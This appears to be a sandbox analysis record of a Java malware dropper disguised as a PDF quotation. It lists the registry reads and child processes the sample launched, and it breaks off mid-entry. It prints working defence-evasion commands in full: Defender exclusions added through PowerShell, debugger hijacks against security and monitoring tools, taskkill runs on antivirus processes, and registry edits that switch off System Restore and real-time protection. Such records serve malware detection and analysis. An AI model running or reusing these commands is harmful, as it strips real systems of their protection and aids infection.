Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0043-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key opened	\REGISTRY\MACHINE\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x64 en-US)\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName	reg.exe
Key opened	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}\DisplayName	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0043-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}\DisplayName	reg.exe

C:\Windows\system32\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\URGENT QUOTATION-PDF.jar"
1⤵
- Suspicious use of WriteProcessMemory
- Drops desktop.ini file(s)
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
- Adds Run entry to start application
- Loads dropped DLL
PID:1496
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1032
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1516
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1508
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1812
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1772
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:1852
- C:\Windows\system32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:1876
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\LdlkM\Desktop.ini
  2⤵
  - Views/modifies file attributes
  - Drops desktop.ini file(s)
  PID:1916
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\LdlkM\Desktop.ini
  2⤵
  - Views/modifies file attributes
  - Drops desktop.ini file(s)
  PID:1912
- C:\Windows\system32\attrib.exe
  attrib -s -r C:\Users\Admin\LdlkM
  2⤵
  - Views/modifies file attributes
  PID:1136
- C:\Windows\system32\attrib.exe
  attrib +s +r C:\Users\Admin\LdlkM
  2⤵
  - Views/modifies file attributes
  PID:1864
- C:\Windows\system32\attrib.exe
  attrib +h C:\Users\Admin\LdlkM
  2⤵
  - Views/modifies file attributes
  PID:1824
- C:\Windows\system32\attrib.exe
  attrib +h +s +r C:\Users\Admin\LdlkM\lAdax.class
  2⤵
  - Views/modifies file attributes
  PID:1860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\LdlkM','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\LdlkM\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1568
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1660
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1548
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1624
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1056
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:2036
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:1984
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1948
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:328
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1264
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1476
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1764
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1032
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1460
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:368
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:908
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1500
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1772
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1884
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1340
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1932
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1516
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2004
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2020
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1348
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1120
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:1872
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1988
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2012
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1548
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:328
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1508
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:1020
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:1852
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1648
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1860
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:1900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:1148
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1840
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1692
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:1880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:1912
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:1936
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:1932
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:568
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:1832
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:1876
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:1548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:1348
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1532
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:1820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:1948
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:316
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1340
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:620
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:1864
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:612
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:1852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:1384
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:1412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:1912
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1936
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:1872
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:2012
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:1756
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1584
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:1080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:1764
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1572
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1776
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1516
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
    3⤵
    PID:1264
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1512
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:1952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:2024
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1128
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:1556
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1148
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:1852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:1828
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1296
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
    3⤵
    PID:292
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1900
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:316
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1876
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:368
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:2012
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1348
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1948
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
    3⤵
    PID:1764
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:868
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1388
- - C:\Windows\system32\reg.exe
